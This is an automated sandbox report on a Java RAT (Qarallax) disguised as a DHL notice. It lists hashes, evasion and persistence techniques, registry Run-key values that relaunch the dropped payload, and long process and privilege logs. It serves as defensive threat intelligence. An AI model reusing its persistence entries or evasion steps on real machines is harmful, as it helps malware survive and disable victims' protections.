qarallax | 4978e38561ad475d2222684679af717a9f864420c4893d00c74f4d7790e1f8c5

Analysis

max time kernel
139s
max time network
146s
platform
windows10_x64
resource
win10v200722
submitted
20-08-2020 09:11

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

NOTIFICA DI ARRIVO DHL_PDF.jar
Size

411KB
MD5

07a44afbee3453588d1cd6724b53933c
SHA1

0e635ec400e5fb8d68e5d21db1362f898df3ec73
SHA256

4978e38561ad475d2222684679af717a9f864420c4893d00c74f4d7790e1f8c5
SHA512

c3b3b80162224b3de18cca40f7c59c15235910b4ea367d98022babfea0a893495da973096f5ca7e647866520d147f2de9be7a5637ae93a4dcaf7deefac9f7805

Score

10^/10

evasion trojan qarallax persistence

Malware Config

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
QarallaxRAT
Qarallax is a RAT developed by Quaverse and sold as RaaS (RAT as a Service).
trojan qarallax

Qarallax RAT support DLL 1 IoCs

resource	yara_rule
behavioral2/files/0x000100000001ae3b-54.dat	qarallax_dll

Disables Task Manager via registry modification
evasion
Disables use of System Restore points 1 TTPs
evasion

Inhibit System Recovery
T1490
Sets file execution options in registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112

Loads dropped DLL 1 IoCs

pid	Process
3288	java.exe

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1400429095-533421673-2598934218-1000\Software\Microsoft\Windows\CurrentVersion\Run	java.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1400429095-533421673-2598934218-1000\Software\Microsoft\Windows\CurrentVersion\Run\HfdZkYR = "\"C:\\Users\\Admin\\Oracle\\bin\\javaw.exe\" -jar \"C:\\Users\\Admin\\ujTBR\\NXtxm.class\""	java.exe
Key created	\REGISTRY\USER\S-1-5-21-1400429095-533421673-2598934218-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce	java.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1400429095-533421673-2598934218-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\HfdZkYR = "\"C:\\Users\\Admin\\Oracle\\bin\\javaw.exe\" -jar \"C:\\Users\\Admin\\ujTBR\\NXtxm.class\""	java.exe

Drops desktop.ini file(s) 4 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\ujTBR\Desktop.ini	attrib.exe
File opened for modification	C:\Users\Admin\ujTBR\Desktop.ini	attrib.exe
File opened for modification	C:\Users\Admin\ujTBR\Desktop.ini	java.exe
File created	C:\Users\Admin\ujTBR\Desktop.ini	java.exe

Drops file in System32 directory 2 IoCs

description	ioc	Process
File created	C:\Windows\System32\ZEDbD	java.exe
File opened for modification	C:\Windows\System32\ZEDbD	java.exe

Kills process with taskkill 19 IoCs

evasion

pid	Process
3964	taskkill.exe
2116	taskkill.exe
796	taskkill.exe
4360	taskkill.exe
4368	taskkill.exe
5012	taskkill.exe
3736	taskkill.exe
380	taskkill.exe
4784	taskkill.exe
1488	taskkill.exe
2740	taskkill.exe
4988	taskkill.exe
4476	taskkill.exe
4260	taskkill.exe
380	taskkill.exe
3028	taskkill.exe
4560	taskkill.exe
4616	taskkill.exe
3760	taskkill.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
1112	powershell.exe
1112	powershell.exe
1112	powershell.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
3288	java.exe

Suspicious use of AdjustPrivilegeToken 167 IoCs

description	pid	Process
Token: SeIncreaseQuotaPrivilege	3048	WMIC.exe
Token: SeSecurityPrivilege	3048	WMIC.exe
Token: SeTakeOwnershipPrivilege	3048	WMIC.exe
Token: SeLoadDriverPrivilege	3048	WMIC.exe
Token: SeSystemProfilePrivilege	3048	WMIC.exe
Token: SeSystemtimePrivilege	3048	WMIC.exe
Token: SeProfSingleProcessPrivilege	3048	WMIC.exe
Token: SeIncBasePriorityPrivilege	3048	WMIC.exe
Token: SeCreatePagefilePrivilege	3048	WMIC.exe
Token: SeBackupPrivilege	3048	WMIC.exe
Token: SeRestorePrivilege	3048	WMIC.exe
Token: SeShutdownPrivilege	3048	WMIC.exe
Token: SeDebugPrivilege	3048	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3048	WMIC.exe
Token: SeRemoteShutdownPrivilege	3048	WMIC.exe
Token: SeUndockPrivilege	3048	WMIC.exe
Token: SeManageVolumePrivilege	3048	WMIC.exe
Token: 33	3048	WMIC.exe
Token: 34	3048	WMIC.exe
Token: 35	3048	WMIC.exe
Token: 36	3048	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3048	WMIC.exe
Token: SeSecurityPrivilege	3048	WMIC.exe
Token: SeTakeOwnershipPrivilege	3048	WMIC.exe
Token: SeLoadDriverPrivilege	3048	WMIC.exe
Token: SeSystemProfilePrivilege	3048	WMIC.exe
Token: SeSystemtimePrivilege	3048	WMIC.exe
Token: SeProfSingleProcessPrivilege	3048	WMIC.exe
Token: SeIncBasePriorityPrivilege	3048	WMIC.exe
Token: SeCreatePagefilePrivilege	3048	WMIC.exe
Token: SeBackupPrivilege	3048	WMIC.exe
Token: SeRestorePrivilege	3048	WMIC.exe
Token: SeShutdownPrivilege	3048	WMIC.exe
Token: SeDebugPrivilege	3048	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3048	WMIC.exe
Token: SeRemoteShutdownPrivilege	3048	WMIC.exe
Token: SeUndockPrivilege	3048	WMIC.exe
Token: SeManageVolumePrivilege	3048	WMIC.exe
Token: 33	3048	WMIC.exe
Token: 34	3048	WMIC.exe
Token: 35	3048	WMIC.exe
Token: 36	3048	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3448	WMIC.exe
Token: SeSecurityPrivilege	3448	WMIC.exe
Token: SeTakeOwnershipPrivilege	3448	WMIC.exe
Token: SeLoadDriverPrivilege	3448	WMIC.exe
Token: SeSystemProfilePrivilege	3448	WMIC.exe
Token: SeSystemtimePrivilege	3448	WMIC.exe
Token: SeProfSingleProcessPrivilege	3448	WMIC.exe
Token: SeIncBasePriorityPrivilege	3448	WMIC.exe
Token: SeCreatePagefilePrivilege	3448	WMIC.exe
Token: SeBackupPrivilege	3448	WMIC.exe
Token: SeRestorePrivilege	3448	WMIC.exe
Token: SeShutdownPrivilege	3448	WMIC.exe
Token: SeDebugPrivilege	3448	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3448	WMIC.exe
Token: SeRemoteShutdownPrivilege	3448	WMIC.exe
Token: SeUndockPrivilege	3448	WMIC.exe
Token: SeManageVolumePrivilege	3448	WMIC.exe
Token: 33	3448	WMIC.exe
Token: 34	3448	WMIC.exe
Token: 35	3448	WMIC.exe
Token: 36	3448	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3448	WMIC.exe
Token: SeSecurityPrivilege	3448	WMIC.exe
Token: SeTakeOwnershipPrivilege	3448	WMIC.exe
Token: SeLoadDriverPrivilege	3448	WMIC.exe
Token: SeSystemProfilePrivilege	3448	WMIC.exe
Token: SeSystemtimePrivilege	3448	WMIC.exe
Token: SeProfSingleProcessPrivilege	3448	WMIC.exe
Token: SeIncBasePriorityPrivilege	3448	WMIC.exe
Token: SeCreatePagefilePrivilege	3448	WMIC.exe
Token: SeBackupPrivilege	3448	WMIC.exe
Token: SeRestorePrivilege	3448	WMIC.exe
Token: SeShutdownPrivilege	3448	WMIC.exe
Token: SeDebugPrivilege	3448	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3448	WMIC.exe
Token: SeRemoteShutdownPrivilege	3448	WMIC.exe
Token: SeUndockPrivilege	3448	WMIC.exe
Token: SeManageVolumePrivilege	3448	WMIC.exe
Token: 33	3448	WMIC.exe
Token: 34	3448	WMIC.exe
Token: 35	3448	WMIC.exe
Token: 36	3448	WMIC.exe
Token: SeDebugPrivilege	3028	taskkill.exe
Token: SeDebugPrivilege	1112	powershell.exe
Token: SeDebugPrivilege	3964	taskkill.exe
Token: SeDebugPrivilege	2116	taskkill.exe
Token: SeDebugPrivilege	796	taskkill.exe
Token: SeIncreaseQuotaPrivilege	3960	WMIC.exe
Token: SeSecurityPrivilege	3960	WMIC.exe
Token: SeTakeOwnershipPrivilege	3960	WMIC.exe
Token: SeLoadDriverPrivilege	3960	WMIC.exe
Token: SeSystemProfilePrivilege	3960	WMIC.exe
Token: SeSystemtimePrivilege	3960	WMIC.exe
Token: SeProfSingleProcessPrivilege	3960	WMIC.exe
Token: SeIncBasePriorityPrivilege	3960	WMIC.exe
Token: SeCreatePagefilePrivilege	3960	WMIC.exe
Token: SeBackupPrivilege	3960	WMIC.exe
Token: SeRestorePrivilege	3960	WMIC.exe
Token: SeShutdownPrivilege	3960	WMIC.exe
Token: SeDebugPrivilege	3960	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3960	WMIC.exe
Token: SeRemoteShutdownPrivilege	3960	WMIC.exe
Token: SeUndockPrivilege	3960	WMIC.exe
Token: SeManageVolumePrivilege	3960	WMIC.exe
Token: 33	3960	WMIC.exe
Token: 34	3960	WMIC.exe
Token: 35	3960	WMIC.exe
Token: 36	3960	WMIC.exe
Token: SeDebugPrivilege	3736	taskkill.exe
Token: SeIncreaseQuotaPrivilege	3960	WMIC.exe
Token: SeSecurityPrivilege	3960	WMIC.exe
Token: SeTakeOwnershipPrivilege	3960	WMIC.exe
Token: SeLoadDriverPrivilege	3960	WMIC.exe
Token: SeSystemProfilePrivilege	3960	WMIC.exe
Token: SeSystemtimePrivilege	3960	WMIC.exe
Token: SeProfSingleProcessPrivilege	3960	WMIC.exe
Token: SeIncBasePriorityPrivilege	3960	WMIC.exe
Token: SeCreatePagefilePrivilege	3960	WMIC.exe
Token: SeBackupPrivilege	3960	WMIC.exe
Token: SeRestorePrivilege	3960	WMIC.exe
Token: SeShutdownPrivilege	3960	WMIC.exe
Token: SeDebugPrivilege	3960	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3960	WMIC.exe
Token: SeRemoteShutdownPrivilege	3960	WMIC.exe
Token: SeUndockPrivilege	3960	WMIC.exe
Token: SeManageVolumePrivilege	3960	WMIC.exe
Token: 33	3960	WMIC.exe
Token: 34	3960	WMIC.exe
Token: 35	3960	WMIC.exe
Token: 36	3960	WMIC.exe
Token: SeDebugPrivilege	2740	taskkill.exe
Token: SeIncreaseQuotaPrivilege	1112	powershell.exe
Token: SeSecurityPrivilege	1112	powershell.exe
Token: SeTakeOwnershipPrivilege	1112	powershell.exe
Token: SeLoadDriverPrivilege	1112	powershell.exe
Token: SeSystemProfilePrivilege	1112	powershell.exe
Token: SeSystemtimePrivilege	1112	powershell.exe
Token: SeProfSingleProcessPrivilege	1112	powershell.exe
Token: SeIncBasePriorityPrivilege	1112	powershell.exe
Token: SeCreatePagefilePrivilege	1112	powershell.exe
Token: SeBackupPrivilege	1112	powershell.exe
Token: SeRestorePrivilege	1112	powershell.exe
Token: SeShutdownPrivilege	1112	powershell.exe
Token: SeDebugPrivilege	1112	powershell.exe
Token: SeSystemEnvironmentPrivilege	1112	powershell.exe
Token: SeRemoteShutdownPrivilege	1112	powershell.exe
Token: SeUndockPrivilege	1112	powershell.exe
Token: SeManageVolumePrivilege	1112	powershell.exe
Token: 33	1112	powershell.exe
Token: 34	1112	powershell.exe
Token: 35	1112	powershell.exe
Token: 36	1112	powershell.exe
Token: SeDebugPrivilege	4560	taskkill.exe
Token: SeDebugPrivilege	4988	taskkill.exe
Token: SeDebugPrivilege	4616	taskkill.exe
Token: SeDebugPrivilege	4360	taskkill.exe
Token: SeDebugPrivilege	4476	taskkill.exe
Token: SeDebugPrivilege	380	taskkill.exe
Token: SeDebugPrivilege	4260	taskkill.exe
Token: SeDebugPrivilege	3760	taskkill.exe
Token: SeDebugPrivilege	4784	taskkill.exe
Token: SeDebugPrivilege	4368	taskkill.exe
Token: SeDebugPrivilege	5012	taskkill.exe
Token: SeDebugPrivilege	1488	taskkill.exe
Token: SeDebugPrivilege	380	taskkill.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
3288	java.exe

Suspicious use of WriteProcessMemory 416 IoCs

description	pid	Process	procid_target
PID 3288 wrote to memory of 3844	3288	java.exe	69
PID 3288 wrote to memory of 3844	3288	java.exe	69
PID 3288 wrote to memory of 3952	3288	java.exe	71
PID 3288 wrote to memory of 3952	3288	java.exe	71
PID 3952 wrote to memory of 3048	3952	cmd.exe	73
PID 3952 wrote to memory of 3048	3952	cmd.exe	73
PID 3288 wrote to memory of 3376	3288	java.exe	74
PID 3288 wrote to memory of 3376	3288	java.exe	74
PID 3376 wrote to memory of 3448	3376	cmd.exe	76
PID 3376 wrote to memory of 3448	3376	cmd.exe	76
PID 3288 wrote to memory of 3640	3288	java.exe	78
PID 3288 wrote to memory of 3640	3288	java.exe	78
PID 3288 wrote to memory of 3828	3288	java.exe	80
PID 3288 wrote to memory of 3828	3288	java.exe	80
PID 3288 wrote to memory of 3820	3288	java.exe	82
PID 3288 wrote to memory of 3820	3288	java.exe	82
PID 3288 wrote to memory of 912	3288	java.exe	83
PID 3288 wrote to memory of 912	3288	java.exe	83
PID 3288 wrote to memory of 388	3288	java.exe	85
PID 3288 wrote to memory of 388	3288	java.exe	85
PID 3288 wrote to memory of 1052	3288	java.exe	87
PID 3288 wrote to memory of 1052	3288	java.exe	87
PID 3288 wrote to memory of 1196	3288	java.exe	89
PID 3288 wrote to memory of 1196	3288	java.exe	89
PID 3288 wrote to memory of 2580	3288	java.exe	91
PID 3288 wrote to memory of 2580	3288	java.exe	91
PID 3288 wrote to memory of 3332	3288	java.exe	94
PID 3288 wrote to memory of 3332	3288	java.exe	94
PID 3288 wrote to memory of 1112	3288	java.exe	96
PID 3288 wrote to memory of 1112	3288	java.exe	96
PID 3288 wrote to memory of 2748	3288	java.exe	98
PID 3288 wrote to memory of 2748	3288	java.exe	98
PID 3288 wrote to memory of 1976	3288	java.exe	99
PID 3288 wrote to memory of 1976	3288	java.exe	99
PID 3288 wrote to memory of 3028	3288	java.exe	100
PID 3288 wrote to memory of 3028	3288	java.exe	100
PID 3288 wrote to memory of 1328	3288	java.exe	103
PID 3288 wrote to memory of 1328	3288	java.exe	103
PID 3288 wrote to memory of 3200	3288	java.exe	104
PID 3288 wrote to memory of 3200	3288	java.exe	104
PID 3288 wrote to memory of 360	3288	java.exe	108
PID 3288 wrote to memory of 360	3288	java.exe	108
PID 3332 wrote to memory of 1304	3332	cmd.exe	109
PID 3332 wrote to memory of 1304	3332	cmd.exe	109
PID 3288 wrote to memory of 3760	3288	java.exe	110
PID 3288 wrote to memory of 3760	3288	java.exe	110
PID 3288 wrote to memory of 3864	3288	java.exe	113
PID 3288 wrote to memory of 3864	3288	java.exe	113
PID 3288 wrote to memory of 3872	3288	java.exe	114
PID 3288 wrote to memory of 3872	3288	java.exe	114
PID 3288 wrote to memory of 1552	3288	java.exe	117
PID 3288 wrote to memory of 1552	3288	java.exe	117
PID 3288 wrote to memory of 2512	3288	java.exe	118
PID 3288 wrote to memory of 2512	3288	java.exe	118
PID 3288 wrote to memory of 3044	3288	java.exe	121
PID 3288 wrote to memory of 3044	3288	java.exe	121
PID 3288 wrote to memory of 2172	3288	java.exe	122
PID 3288 wrote to memory of 2172	3288	java.exe	122
PID 3332 wrote to memory of 2020	3332	cmd.exe	125
PID 3332 wrote to memory of 2020	3332	cmd.exe	125
PID 3288 wrote to memory of 2824	3288	java.exe	126
PID 3288 wrote to memory of 2824	3288	java.exe	126
PID 3288 wrote to memory of 2116	3288	java.exe	127
PID 3288 wrote to memory of 2116	3288	java.exe	127
PID 3288 wrote to memory of 3964	3288	java.exe	128
PID 3288 wrote to memory of 3964	3288	java.exe	128
PID 3288 wrote to memory of 2700	3288	java.exe	132
PID 3288 wrote to memory of 2700	3288	java.exe	132
PID 3288 wrote to memory of 3996	3288	java.exe	134
PID 3288 wrote to memory of 3996	3288	java.exe	134
PID 3288 wrote to memory of 3960	3288	java.exe	135
PID 3288 wrote to memory of 3960	3288	java.exe	135
PID 3288 wrote to memory of 1060	3288	java.exe	138
PID 3288 wrote to memory of 1060	3288	java.exe	138
PID 3288 wrote to memory of 3816	3288	java.exe	139
PID 3288 wrote to memory of 3816	3288	java.exe	139
PID 3288 wrote to memory of 796	3288	java.exe	142
PID 3288 wrote to memory of 796	3288	java.exe	142
PID 3288 wrote to memory of 604	3288	java.exe	143
PID 3288 wrote to memory of 604	3288	java.exe	143
PID 3288 wrote to memory of 2696	3288	java.exe	147
PID 3288 wrote to memory of 2696	3288	java.exe	147
PID 3288 wrote to memory of 2580	3288	java.exe	148
PID 3288 wrote to memory of 2580	3288	java.exe	148
PID 3288 wrote to memory of 3864	3288	java.exe	151
PID 3288 wrote to memory of 3864	3288	java.exe	151
PID 3288 wrote to memory of 3032	3288	java.exe	152
PID 3288 wrote to memory of 3032	3288	java.exe	152
PID 3288 wrote to memory of 1316	3288	java.exe	155
PID 3288 wrote to memory of 1316	3288	java.exe	155
PID 3288 wrote to memory of 3148	3288	java.exe	156
PID 3288 wrote to memory of 3148	3288	java.exe	156
PID 3288 wrote to memory of 3200	3288	java.exe	159
PID 3288 wrote to memory of 3200	3288	java.exe	159
PID 3288 wrote to memory of 964	3288	java.exe	161
PID 3288 wrote to memory of 964	3288	java.exe	161
PID 2700 wrote to memory of 3044	2700	cmd.exe	163
PID 2700 wrote to memory of 3044	2700	cmd.exe	163
PID 3288 wrote to memory of 3560	3288	java.exe	164
PID 3288 wrote to memory of 3560	3288	java.exe	164
PID 3288 wrote to memory of 2824	3288	java.exe	166
PID 3288 wrote to memory of 2824	3288	java.exe	166
PID 3288 wrote to memory of 2116	3288	java.exe	167
PID 3288 wrote to memory of 2116	3288	java.exe	167
PID 3288 wrote to memory of 1008	3288	java.exe	169
PID 3288 wrote to memory of 1008	3288	java.exe	169
PID 3288 wrote to memory of 3144	3288	java.exe	172
PID 3288 wrote to memory of 3144	3288	java.exe	172
PID 2700 wrote to memory of 3520	2700	cmd.exe	174
PID 2700 wrote to memory of 3520	2700	cmd.exe	174
PID 3288 wrote to memory of 796	3288	java.exe	175
PID 3288 wrote to memory of 796	3288	java.exe	175
PID 3288 wrote to memory of 2616	3288	java.exe	177
PID 3288 wrote to memory of 2616	3288	java.exe	177
PID 2616 wrote to memory of 3328	2616	cmd.exe	179
PID 2616 wrote to memory of 3328	2616	cmd.exe	179
PID 2616 wrote to memory of 3148	2616	cmd.exe	180
PID 2616 wrote to memory of 3148	2616	cmd.exe	180
PID 3288 wrote to memory of 3820	3288	java.exe	181
PID 3288 wrote to memory of 3820	3288	java.exe	181
PID 3820 wrote to memory of 1328	3820	cmd.exe	183
PID 3820 wrote to memory of 1328	3820	cmd.exe	183
PID 3820 wrote to memory of 2740	3820	cmd.exe	184
PID 3820 wrote to memory of 2740	3820	cmd.exe	184
PID 3288 wrote to memory of 2128	3288	java.exe	185
PID 3288 wrote to memory of 2128	3288	java.exe	185
PID 2128 wrote to memory of 4000	2128	cmd.exe	187
PID 2128 wrote to memory of 4000	2128	cmd.exe	187
PID 2128 wrote to memory of 2692	2128	cmd.exe	188
PID 2128 wrote to memory of 2692	2128	cmd.exe	188
PID 3288 wrote to memory of 3920	3288	java.exe	189
PID 3288 wrote to memory of 3920	3288	java.exe	189
PID 3288 wrote to memory of 3052	3288	java.exe	191
PID 3288 wrote to memory of 3052	3288	java.exe	191
PID 3920 wrote to memory of 1552	3920	cmd.exe	193
PID 3920 wrote to memory of 1552	3920	cmd.exe	193
PID 3052 wrote to memory of 3960	3052	cmd.exe	194
PID 3052 wrote to memory of 3960	3052	cmd.exe	194
PID 3288 wrote to memory of 3736	3288	java.exe	195
PID 3288 wrote to memory of 3736	3288	java.exe	195
PID 3920 wrote to memory of 2804	3920	cmd.exe	197
PID 3920 wrote to memory of 2804	3920	cmd.exe	197
PID 3288 wrote to memory of 3444	3288	java.exe	198
PID 3288 wrote to memory of 3444	3288	java.exe	198
PID 3444 wrote to memory of 2740	3444	cmd.exe	200
PID 3444 wrote to memory of 2740	3444	cmd.exe	200
PID 3444 wrote to memory of 1000	3444	cmd.exe	201
PID 3444 wrote to memory of 1000	3444	cmd.exe	201
PID 3288 wrote to memory of 3028	3288	java.exe	202
PID 3288 wrote to memory of 3028	3288	java.exe	202
PID 3028 wrote to memory of 3812	3028	cmd.exe	204
PID 3028 wrote to memory of 3812	3028	cmd.exe	204
PID 3028 wrote to memory of 3144	3028	cmd.exe	205
PID 3028 wrote to memory of 3144	3028	cmd.exe	205
PID 3288 wrote to memory of 2804	3288	java.exe	206
PID 3288 wrote to memory of 2804	3288	java.exe	206
PID 2804 wrote to memory of 2740	2804	cmd.exe	208
PID 2804 wrote to memory of 2740	2804	cmd.exe	208
PID 2804 wrote to memory of 1000	2804	cmd.exe	209
PID 2804 wrote to memory of 1000	2804	cmd.exe	209
PID 3288 wrote to memory of 2580	3288	java.exe	210
PID 3288 wrote to memory of 2580	3288	java.exe	210
PID 2580 wrote to memory of 3640	2580	cmd.exe	212
PID 2580 wrote to memory of 3640	2580	cmd.exe	212
PID 2580 wrote to memory of 1304	2580	cmd.exe	213
PID 2580 wrote to memory of 1304	2580	cmd.exe	213
PID 3288 wrote to memory of 2748	3288	java.exe	214
PID 3288 wrote to memory of 2748	3288	java.exe	214
PID 2748 wrote to memory of 2740	2748	cmd.exe	216
PID 2748 wrote to memory of 2740	2748	cmd.exe	216
PID 2748 wrote to memory of 1000	2748	cmd.exe	217
PID 2748 wrote to memory of 1000	2748	cmd.exe	217
PID 3288 wrote to memory of 3228	3288	java.exe	218
PID 3288 wrote to memory of 3228	3288	java.exe	218
PID 3228 wrote to memory of 788	3228	cmd.exe	220
PID 3228 wrote to memory of 788	3228	cmd.exe	220
PID 3228 wrote to memory of 3864	3228	cmd.exe	221
PID 3228 wrote to memory of 3864	3228	cmd.exe	221
PID 3288 wrote to memory of 1200	3288	java.exe	222
PID 3288 wrote to memory of 1200	3288	java.exe	222
PID 1200 wrote to memory of 3020	1200	cmd.exe	224
PID 1200 wrote to memory of 3020	1200	cmd.exe	224
PID 3288 wrote to memory of 2740	3288	java.exe	225
PID 3288 wrote to memory of 2740	3288	java.exe	225
PID 1200 wrote to memory of 3976	1200	cmd.exe	227
PID 1200 wrote to memory of 3976	1200	cmd.exe	227
PID 3288 wrote to memory of 4124	3288	java.exe	228
PID 3288 wrote to memory of 4124	3288	java.exe	228
PID 4124 wrote to memory of 4180	4124	cmd.exe	230
PID 4124 wrote to memory of 4180	4124	cmd.exe	230
PID 4124 wrote to memory of 4200	4124	cmd.exe	231
PID 4124 wrote to memory of 4200	4124	cmd.exe	231
PID 3288 wrote to memory of 4220	3288	java.exe	232
PID 3288 wrote to memory of 4220	3288	java.exe	232
PID 4220 wrote to memory of 4256	4220	cmd.exe	234
PID 4220 wrote to memory of 4256	4220	cmd.exe	234
PID 4220 wrote to memory of 4280	4220	cmd.exe	235
PID 4220 wrote to memory of 4280	4220	cmd.exe	235
PID 3288 wrote to memory of 4304	3288	java.exe	236
PID 3288 wrote to memory of 4304	3288	java.exe	236
PID 4304 wrote to memory of 4340	4304	cmd.exe	238
PID 4304 wrote to memory of 4340	4304	cmd.exe	238
PID 4304 wrote to memory of 4360	4304	cmd.exe	239
PID 4304 wrote to memory of 4360	4304	cmd.exe	239
PID 3288 wrote to memory of 4380	3288	java.exe	240
PID 3288 wrote to memory of 4380	3288	java.exe	240
PID 4380 wrote to memory of 4420	4380	cmd.exe	242
PID 4380 wrote to memory of 4420	4380	cmd.exe	242
PID 4380 wrote to memory of 4448	4380	cmd.exe	243
PID 4380 wrote to memory of 4448	4380	cmd.exe	243
PID 3288 wrote to memory of 4468	3288	java.exe	244
PID 3288 wrote to memory of 4468	3288	java.exe	244
PID 4468 wrote to memory of 4504	4468	cmd.exe	246
PID 4468 wrote to memory of 4504	4468	cmd.exe	246
PID 4468 wrote to memory of 4524	4468	cmd.exe	247
PID 4468 wrote to memory of 4524	4468	cmd.exe	247
PID 3288 wrote to memory of 4544	3288	java.exe	248
PID 3288 wrote to memory of 4544	3288	java.exe	248
PID 3288 wrote to memory of 4560	3288	java.exe	249
PID 3288 wrote to memory of 4560	3288	java.exe	249
PID 4544 wrote to memory of 4656	4544	cmd.exe	253
PID 4544 wrote to memory of 4656	4544	cmd.exe	253
PID 4544 wrote to memory of 4692	4544	cmd.exe	254
PID 4544 wrote to memory of 4692	4544	cmd.exe	254
PID 3288 wrote to memory of 4732	3288	java.exe	255
PID 3288 wrote to memory of 4732	3288	java.exe	255
PID 4732 wrote to memory of 4768	4732	cmd.exe	257
PID 4732 wrote to memory of 4768	4732	cmd.exe	257
PID 4732 wrote to memory of 4792	4732	cmd.exe	258
PID 4732 wrote to memory of 4792	4732	cmd.exe	258
PID 3288 wrote to memory of 4816	3288	java.exe	259
PID 3288 wrote to memory of 4816	3288	java.exe	259
PID 4816 wrote to memory of 4852	4816	cmd.exe	261
PID 4816 wrote to memory of 4852	4816	cmd.exe	261
PID 4816 wrote to memory of 4872	4816	cmd.exe	262
PID 4816 wrote to memory of 4872	4816	cmd.exe	262
PID 3288 wrote to memory of 4892	3288	java.exe	263
PID 3288 wrote to memory of 4892	3288	java.exe	263
PID 4892 wrote to memory of 4928	4892	cmd.exe	265
PID 4892 wrote to memory of 4928	4892	cmd.exe	265
PID 4892 wrote to memory of 4948	4892	cmd.exe	266
PID 4892 wrote to memory of 4948	4892	cmd.exe	266
PID 3288 wrote to memory of 4968	3288	java.exe	267
PID 3288 wrote to memory of 4968	3288	java.exe	267
PID 3288 wrote to memory of 4988	3288	java.exe	268
PID 3288 wrote to memory of 4988	3288	java.exe	268
PID 4968 wrote to memory of 5068	4968	cmd.exe	271
PID 4968 wrote to memory of 5068	4968	cmd.exe	271
PID 4968 wrote to memory of 5100	4968	cmd.exe	272
PID 4968 wrote to memory of 5100	4968	cmd.exe	272
PID 3288 wrote to memory of 3472	3288	java.exe	273
PID 3288 wrote to memory of 3472	3288	java.exe	273
PID 3472 wrote to memory of 4184	3472	cmd.exe	275
PID 3472 wrote to memory of 4184	3472	cmd.exe	275
PID 3472 wrote to memory of 4204	3472	cmd.exe	276
PID 3472 wrote to memory of 4204	3472	cmd.exe	276
PID 3288 wrote to memory of 4148	3288	java.exe	277
PID 3288 wrote to memory of 4148	3288	java.exe	277
PID 4148 wrote to memory of 3988	4148	cmd.exe	279
PID 4148 wrote to memory of 3988	4148	cmd.exe	279
PID 4148 wrote to memory of 2172	4148	cmd.exe	280
PID 4148 wrote to memory of 2172	4148	cmd.exe	280
PID 3288 wrote to memory of 4288	3288	java.exe	281
PID 3288 wrote to memory of 4288	3288	java.exe	281
PID 4288 wrote to memory of 4348	4288	cmd.exe	283
PID 4288 wrote to memory of 4348	4288	cmd.exe	283
PID 4288 wrote to memory of 4340	4288	cmd.exe	284
PID 4288 wrote to memory of 4340	4288	cmd.exe	284
PID 3288 wrote to memory of 4388	3288	java.exe	285
PID 3288 wrote to memory of 4388	3288	java.exe	285
PID 4388 wrote to memory of 4452	4388	cmd.exe	287
PID 4388 wrote to memory of 4452	4388	cmd.exe	287
PID 4388 wrote to memory of 4484	4388	cmd.exe	288
PID 4388 wrote to memory of 4484	4388	cmd.exe	288
PID 3288 wrote to memory of 4508	3288	java.exe	289
PID 3288 wrote to memory of 4508	3288	java.exe	289
PID 4508 wrote to memory of 4568	4508	cmd.exe	291
PID 4508 wrote to memory of 4568	4508	cmd.exe	291
PID 4508 wrote to memory of 4656	4508	cmd.exe	293
PID 4508 wrote to memory of 4656	4508	cmd.exe	293
PID 3288 wrote to memory of 4712	3288	java.exe	294
PID 3288 wrote to memory of 4712	3288	java.exe	294
PID 3288 wrote to memory of 4616	3288	java.exe	296
PID 3288 wrote to memory of 4616	3288	java.exe	296
PID 4712 wrote to memory of 4748	4712	cmd.exe	298
PID 4712 wrote to memory of 4748	4712	cmd.exe	298
PID 4712 wrote to memory of 4876	4712	cmd.exe	299
PID 4712 wrote to memory of 4876	4712	cmd.exe	299
PID 3288 wrote to memory of 4932	3288	java.exe	301
PID 3288 wrote to memory of 4932	3288	java.exe	301
PID 4932 wrote to memory of 4996	4932	cmd.exe	303
PID 4932 wrote to memory of 4996	4932	cmd.exe	303
PID 4932 wrote to memory of 3756	4932	cmd.exe	304
PID 4932 wrote to memory of 3756	4932	cmd.exe	304
PID 3288 wrote to memory of 604	3288	java.exe	305
PID 3288 wrote to memory of 604	3288	java.exe	305
PID 604 wrote to memory of 4392	604	cmd.exe	307
PID 604 wrote to memory of 4392	604	cmd.exe	307
PID 604 wrote to memory of 1460	604	cmd.exe	308
PID 604 wrote to memory of 1460	604	cmd.exe	308
PID 3288 wrote to memory of 5108	3288	java.exe	309
PID 3288 wrote to memory of 5108	3288	java.exe	309
PID 5108 wrote to memory of 5036	5108	cmd.exe	311
PID 5108 wrote to memory of 5036	5108	cmd.exe	311
PID 5108 wrote to memory of 4988	5108	cmd.exe	312
PID 5108 wrote to memory of 4988	5108	cmd.exe	312
PID 3288 wrote to memory of 3020	3288	java.exe	313
PID 3288 wrote to memory of 3020	3288	java.exe	313
PID 3020 wrote to memory of 4116	3020	cmd.exe	315
PID 3020 wrote to memory of 4116	3020	cmd.exe	315
PID 3020 wrote to memory of 4208	3020	cmd.exe	316
PID 3020 wrote to memory of 4208	3020	cmd.exe	316
PID 3288 wrote to memory of 3988	3288	java.exe	317
PID 3288 wrote to memory of 3988	3288	java.exe	317
PID 3988 wrote to memory of 4368	3988	cmd.exe	319
PID 3988 wrote to memory of 4368	3988	cmd.exe	319
